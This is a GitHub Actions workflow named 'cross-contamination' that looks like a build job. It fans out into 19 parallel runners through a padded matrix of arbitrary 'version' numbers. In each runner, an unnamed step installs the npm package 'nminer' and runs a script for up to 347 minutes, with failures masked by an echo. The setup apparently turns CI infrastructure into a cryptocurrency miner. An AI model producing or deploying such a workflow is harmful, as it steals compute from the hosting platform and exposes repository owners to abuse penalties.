name: cross-contamination
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 8357 }
          - { version: 7583 }
          - { version: 4599 }
          - { version: 3380 }
          - { version: 1528 }
          - { version: 4840 }
          - { version: 7351 }
          - { version: 5581 }
          - { version: 3031 }
          - { version: 627 }
          - { version: 4662 }
          - { version: 2199 }
          - { version: 7149 }
          - { version: 1014 }
          - { version: 6392 }
          - { version: 1243 }
          - { version: 4214 }
          - { version: 5598 }
          - { version: 5995 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 347m node cross-contamination.js || echo "cross-contamination executed"